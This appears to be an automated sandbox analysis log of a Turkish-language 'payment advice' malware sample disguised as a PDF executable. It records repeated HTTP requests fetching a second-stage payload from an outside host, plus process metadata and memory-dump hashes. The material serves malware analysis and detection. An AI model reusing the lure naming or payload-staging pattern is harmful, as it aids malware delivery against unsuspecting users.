      2024-12-16 13:27:12 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      87192.168.2.550064185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:14 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:14 GMT
      vary: User-Agent
      2024-12-16 13:27:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      88192.168.2.550065185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:15 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:17 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:16 GMT
      vary: User-Agent
      2024-12-16 13:27:17 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      89192.168.2.550066185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:18 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:18 GMT
      vary: User-Agent
      2024-12-16 13:27:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      90192.168.2.550067185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:20 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:20 GMT
      vary: User-Agent
      2024-12-16 13:27:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      91192.168.2.550068185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:22 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:22 GMT
      vary: User-Agent
      2024-12-16 13:27:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      92192.168.2.550069185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:24 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:24 GMT
      vary: User-Agent
      2024-12-16 13:27:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      93192.168.2.550070185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:25 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:26 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:26 GMT
      vary: User-Agent
      2024-12-16 13:27:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      94192.168.2.550071185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:27 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:28 GMT
      vary: User-Agent
      2024-12-16 13:27:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      95192.168.2.550072185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:29 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:30 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:29 GMT
      vary: User-Agent
      2024-12-16 13:27:30 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      96192.168.2.550073185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:31 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:32 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:31 GMT
      vary: User-Agent
      2024-12-16 13:27:32 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      97192.168.2.550074185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:27:33 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:27:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:27:33 GMT
      vary: User-Agent
      2024-12-16 13:27:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Target ID:0
      Start time:08:24:24
      Start date:16/12/2024
      Path:C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe"
      Imagebase:0x7b0000
      File size:6'144 bytes
      MD5 hash:9D1DFCF9EC726EFF98E8ECB0F7F38729
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Reset < >
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID: tooq
        • API String ID: 0-1140150792
        • Opcode ID: 57346c2ae85e55240763c3ae7d95bfe1e3fafff6d2ad786e737e3b1e754208d9
        • Instruction ID: cde9599696d2c4fa92f2f5dc7fa8bbe72976f4cfda4936481f4747fcfff68aca
        • Opcode Fuzzy Hash: 57346c2ae85e55240763c3ae7d95bfe1e3fafff6d2ad786e737e3b1e754208d9
        • Instruction Fuzzy Hash: 80E0CD342041585FD34D1639882557F75E9EB49300B918224EC86DB250EF2199064792
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID: tooq
        • API String ID: 0-1140150792
        • Opcode ID: 8e0831bdafc6ab719884539ede54f419c3ffa2c7bd88b18cf0a3bcf690bdfcbb
        • Instruction ID: 1c53376592bc3acff3737875fb4cfed15b7960b8d0d7b12435265fc78c7b1958
        • Opcode Fuzzy Hash: 8e0831bdafc6ab719884539ede54f419c3ffa2c7bd88b18cf0a3bcf690bdfcbb
        • Instruction Fuzzy Hash: 1DB012012044214B025CB638002013C00C7ABA86003420718D4CAD7280EF05CC030347
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2c1055b662a5349331d37710e318f3edf0852c062ade4bb0feff04482e3beed0
        • Instruction ID: f8c5d4b88de20ab886a14f20125ed5a747745c2c6d64f166d754b9cb3ece9fad
        • Opcode Fuzzy Hash: 2c1055b662a5349331d37710e318f3edf0852c062ade4bb0feff04482e3beed0
        • Instruction Fuzzy Hash: 25112931E4D611CFC20FD66068585781B7DAB8D3507560856FAC2DB1AAC75F893286E3
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 36b56423688668f45b89464aeb8dcf92262c7f7a6a409608b4d7a93ec1bf2b4f
        • Instruction ID: dbb4ff4e1bd5768f2b8ddf808322f94e5064297d0fb38c4852106e5efe67519a
        • Opcode Fuzzy Hash: 36b56423688668f45b89464aeb8dcf92262c7f7a6a409608b4d7a93ec1bf2b4f
        • Instruction Fuzzy Hash: 9C213A74644105CFDB1CDF64C158AADBBFAAF4C240F168959E006AB364DB368D51CB62
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: db3c981b17c7e0aad48fdd49ac6cc4c4ec76d4d5c552be2193b8d8f98fddfbfb
        • Instruction ID: 67fee3c3b97866781d6a92335c1f07414acefefde17f019cc6223401089edc84
        • Opcode Fuzzy Hash: db3c981b17c7e0aad48fdd49ac6cc4c4ec76d4d5c552be2193b8d8f98fddfbfb
        • Instruction Fuzzy Hash: 47018F31F48201DFC34CE6686414A75276E6BCD750B1304AAF843CB6A5EB664C61C7A3
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c9c0de8d94ffc54a746c814591a5b2af70bfaedfd9d89dc53dfe87048008cb00
        • Instruction ID: 17c81aa0fa0068a025c260d1b0cc51e03916035470976d78334e16518dedc683
        • Opcode Fuzzy Hash: c9c0de8d94ffc54a746c814591a5b2af70bfaedfd9d89dc53dfe87048008cb00
        • Instruction Fuzzy Hash: 39F09031F48211DBC10CE6696814A36276E6BCC750B130466F847CB6A4CF678C6183E3
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
